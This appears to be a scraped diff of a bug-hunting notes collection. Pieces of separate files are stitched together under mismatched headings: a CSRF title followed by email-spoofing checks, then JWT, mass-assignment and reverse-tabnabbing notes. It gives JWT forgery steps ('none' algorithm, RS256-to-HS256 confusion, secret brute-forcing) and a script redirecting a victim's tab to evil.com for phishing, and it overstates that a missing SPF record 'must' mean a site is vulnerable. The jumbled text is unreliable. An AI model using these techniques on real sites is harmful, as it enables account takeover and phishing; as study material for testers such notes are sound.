Bypass/Bypass CSRF.mdCross Site Request Forgery.md
1
-
# Bypass CSRF Token
1
+
# Cross Site Request Forgery (CSRF)
2
+
## Introduction
3
+
Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.
Email spoofing is a technique used in spam and phishing attacks to trick users into thinking a message came from a person or entity they either know or can trust. In spoofing attacks, the sender forges email headers so that client software displays the fraudulent sender address, which most users take at face value.
4
+
5
+
## How to Find
6
+
1. Check the SPF records, if the website don't have a SPF record, the website must be vulnerable to email spoofing
7
+
```
8
+
v=spf1 include:_spf.google.com ~all
9
+
```
10
+
2. Check the DMARC records, if the website don't have a DMARC record or the value of tag policy is `none`, the website must be vulnerable to email spoofing
JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object.
4
+
5
+
## How to Exploit
6
+
1. Modify the algorithm to "none" algorithm
7
+
```
8
+
{
9
+
"alg": "none",
10
+
"typ": "JWT"
11
+
}
12
+
```
13
+
2. Modify the algorithm RS256 to HS256
14
+
15
+
If you change the algorithm from RS256 to HS256, the backend code uses the public key as the secret key and then uses the HS256 algorithm to verify the signature.
16
+
17
+
3. Bruteforce HS256
18
+
19
+
the HS256 key strength is weak, it can be directly brute-forced, such as using the secret string as a key in the PyJWT library sample code.
20
+
21
+
Reference:
22
+
- [Hacking JSON Web Token (JWT)](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS
When you open a link in a new tab ( target="_blank" ), the page that opens in a new tab can access the initial tab and change it's location using the window.opener property.
4
+
5
+
## How to Find
6
+
```html
7
+
<a href="..." target="_blank" rel="" />
8
+
9
+
<a href="..." target="_blank" />
10
+
```
11
+
12
+
## How to Exploit
13
+
1. Attacker posts a link to a website under his control that contains the following JS code:
14
+
```html
15
+
<html>
16
+
<script>
17
+
if (window.opener) window.opener.parent.location.replace('http://evil.com');
18
+
if (window.parent != window) window.parent.location.replace('http://evil.com');
19
+
</script>
20
+
</html>
21
+
```
22
+
2. He tricks the victim into visiting the link, which is opened in the browser in a new tab.
23
+
3. At the same time the JS code is executed and the background tab is redirected to the website evil.com, which is most likely a phishing website.
